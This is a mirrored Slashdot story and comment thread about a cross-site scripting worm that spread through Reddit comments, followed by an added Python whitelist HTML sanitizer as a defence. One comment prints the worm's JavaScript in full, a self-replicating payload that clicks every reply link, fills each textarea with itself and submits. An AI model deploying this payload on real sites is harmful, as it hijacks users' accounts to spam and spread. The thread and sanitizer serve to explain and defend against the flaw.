Slashdot Mirror


Reddit Javascript Exploit Spreading Virally

Nithendil writes "guyhersh from reddit.com describes the situation (warning: title NSFW): Based on what I've seen today, here's what went down. Reddit user Empirical wrote javascript code where if you copied and pasted it into the address bar, you would instantly spam that comment by replying to all the comments on the page and submitting it. Later xssfinder posted a proof of concept where if you hovered over a link, it would automatically run a Javascript. He then got the brilliant idea to combine the two scripts together, tested it and it spread from there."

5 of 239 comments

  1. Re:proof of concept by immortalpob · Score: 4, Informative

    This is a flaw in Reddit's comment system that allows the poster to get javascript code executed. A comment system should not allow you to use "onhover"; that is the point.

  2. Re:Well, that site has a terrible design by aoni782 · Score: 4, Informative

    The script:

    z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('textarea');for(i=0;i<e.length;i++)e[i].value=z;e=o.getElementsByTagName('button');for(i=0;i<e.length;i++)if (e[i].innerHTML=='save'&&e[i].style.display!='none')$(e[i]).click();"

  3. Mod parent down by bluej100 · Score: 3, Informative

    The correct solution is a whitelisted HTML parser and generator, like HTML Purifier.

  4. Re:Is this good news or bad? by blowdart · Score: 3, Informative

    No it's not. The Reddit hack was a Cross Site Scripting attack made possible by bugs in their markdown implementation which let javascript through the parser. It was not a SQL injection attack, it did not attack the database directly, no commands were run to directly put data into the database. It's an entirely different vector and an entirely different vulnerability, all the stored procedures, escaping of apostrophes and parametrised SQL in the world would not have stopped this.

  5. Re:Is this good news or bad? by Serious+Callers+Only · Score: 3, Informative

    Filtering user input properly would have stopped this though. It is not an attack which relies on a flaw specific to javascript - the flaw is a very general one - using untrusted user input without aggressive filtering.
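A whitelist HTML sanitizer of the kind bluej100 and Serious+Callers+Only describe, as an added example that is not the page's, reddit's or HTML Purifier's code; the tag, attribute and URL-scheme lists are assumptions chosen for the demo. Everything not explicitly allowed is dropped, so an onmouseover attribute of the sort the worm relied on never reaches the rendered page, and a javascript: href is removed as well.

```python
# Added example (not reddit's or HTML Purifier's code): whitelist-based
# sanitizer run over the HTML produced from a user's comment. Unknown tags,
# unknown attributes (onmouseover, style, ...) and non-whitelisted URL
# schemes are dropped rather than escaped around.
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "code", "pre", "br"}
ALLOWED_ATTRS = {"a": {"href", "title"}}      # assumed policy for the demo
ALLOWED_SCHEMES = {"http", "https", "mailto", ""}   # "" = relative URL
VOID_TAGS = {"br"}

def safe_url(url):
    """Accept only http(s), mailto or relative URLs; reject javascript: etc."""
    return urlparse(url.strip()).scheme.lower() in ALLOWED_SCHEMES

class Whitelist(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open = []   # stack of tags we emitted, so we only close those

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                       # unknown tag: drop it, keep its text
        kept = []
        for name, value in attrs:        # HTMLParser already lowercases names
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                 # drops onmouseover, onerror, style...
            if name == "href" and not safe_url(value or ""):
                continue                 # drops javascript: / data: links
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open:             # close up to and including this tag
            while self.open:
                t = self.open.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        self.out.append(escape(data))    # text content is always re-escaped

def sanitize(html):
    p = Whitelist()
    p.feed(html)
    p.close()
    p.out.extend(f"</{t}>" for t in reversed(p.open))   # close what was left open
    return "".join(p.out)
```

Checking the output of the comment renderer against a policy like this, rather than trying to blacklist individual attributes, is what turns a markdown parser bug into a non-event.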